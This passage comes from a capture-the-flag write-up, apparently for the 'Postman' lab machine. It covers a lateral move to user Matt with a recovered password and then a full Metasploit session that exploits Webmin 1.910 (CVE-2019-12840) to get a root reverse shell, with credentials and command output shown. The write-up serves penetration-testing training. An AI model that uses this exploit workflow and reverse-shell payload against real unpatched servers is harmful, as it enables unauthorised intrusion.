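MODERN_KEY = ("-----BEGIN OPENSSH PRIVATE KEY-----\n"
              + base64.b64encode(_body).decode() + "\n-----END OPENSSH PRIVATE KEY-----\n")
```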

However, while I was fiddling with the cracking, I checked /etc/ssh/sshd_config just in case,
and Matt had been banned from logging in.

Oh no /(^o^)\

redis@Postman:/etc/ssh$ cat sshd_config
#       $OpenBSD: sshd_config,v 1.101 2017/03/14 07:19:07 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# This sshd was compiled with PATH=/usr/bin:/bin:/usr/sbin:/sbin

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin yes
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

PubkeyAuthentication yes

# Expect .ssh/authorized_keys2 to be disregarded by default in future.
AuthorizedKeysFile      .ssh/authorized_keys .ssh/authorized_keys2

#AuthorizedPrincipalsFile none

#AuthorizedKeysCommand none
#AuthorizedKeysCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication yes
#PermitEmptyPasswords no

# Change to yes to enable challenge-response passwords (beware issues with
# some PAM modules and threads)
ChallengeResponseAuthentication no

# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no

# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#GSSAPIStrictAcceptorCheck yes
#GSSAPIKeyExchange no

# Set this to 'yes' to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication.  Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to 'no'.
UsePAM yes
#AllowAgentForwarding yes
#AllowTcpForwarding yes
#GatewayPorts no
X11Forwarding yes
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

#deny users
DenyUsers Matt

# no default banner path
#Banner none

# Allow client to pass locale environment variables
AcceptEnv LANG LC_*

# override default of no subsystems
Subsystem       sftp    /usr/lib/openssh/sftp-server
# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server

From the redis user I was able to become Matt with su -.
With that, User was safely obtained.

redis@Postman:~$ su - Matt
Password: 
Matt@Postman:~$ 
Matt@Postman:~$ ls -ltr
total 4
-rw-rw---- 1 Matt Matt 33 Mar 25 03:45 user.txt
Matt@Postman:~$ cat user.txt

Privilege escalation

When I tried logging into Webmin with Matt's account, it worked.
However, looking at the dashboard, there's nothing particularly interesting.

Webmin's version is 1.910, so let's look for anything interesting about it.

Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)

CVE-2019-12840

There was a remote code execution vulnerability via package updates.
Metasploit looks usable this time, so I decided to use it for the first time in a while.

┌──(kali㉿kali)-[~]
└─$ msfconsole     

Metasploit tip: Use the resource command to run 
commands from a file

msf6 > search CVE-2019-12840

Matching Modules
================

   #  Name                                     Disclosure Date  Rank       Check  Description
   -  ----                                     ---------------  ----       -----  -----------
   0  exploit/linux/http/webmin_packageup_rce  2019-05-16       excellent  Yes    Webmin Package Updates Remote Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/linux/http/webmin_packageup_rce

msf6 > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf6 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/U
                                         sing-Metasploit
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910


msf6 exploit(linux/http/webmin_packageup_rce) > 

A few parameters needed to be set, so let's check them.
LHOST must be set to the IP address of Kali Linux's tun0 interface.

msf6 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf6 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.129.2.1
RHOSTS => 10.129.2.1
msf6 exploit(linux/http/webmin_packageup_rce) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf6 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf6 exploit(linux/http/webmin_packageup_rce) > set LHOST <Kali Linux tun0 IP address>
LHOST => <Kali Linux tun0 IP address>
msf6 exploit(linux/http/webmin_packageup_rce) > 

Now run it. root.txt safely secured.

msf6 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on <Kali Linux tun0 IP address>:4444 
[+] Session cookie: 4dfe5e48635ef91df94ddf1bdd2ef17e
[*] Attempting to execute the payload...
[*] Command shell session 2 opened (<Kali Linux tun0 IP address>:4444 -> 10.129.2.1:33812 ) at 2022-03-25 21:33:36 +0900

id
uid=0(root) gid=0(root) groups=0(root)
pwd
/usr/share/webmin/package-updates
ls /root/
redis-5.0.0
root.txt
cat /root/root.txt